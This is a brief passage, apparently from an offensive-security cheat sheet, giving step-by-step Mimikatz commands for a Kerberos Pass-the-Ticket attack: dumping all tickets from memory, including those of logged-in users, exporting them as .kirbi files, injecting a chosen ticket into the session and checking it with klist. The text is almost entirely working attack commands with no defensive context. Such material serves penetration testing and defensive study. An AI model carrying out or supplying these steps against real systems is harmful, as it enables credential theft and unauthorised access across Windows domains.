5. Pass-the-Ticket


Pass-the-Ticket using Mimikatz:

  1. Start Mimikatz and enable debug.
  2. Dump all Kerberos tickets from memory (including logged in users):
sekurlsa::tickets /export
  1. List all dumped tickets:
dir *.kirbi
  1. Inject any selected ticket:
kerberos::ptt ticket.kirbi
  1. Examine ticket:
klist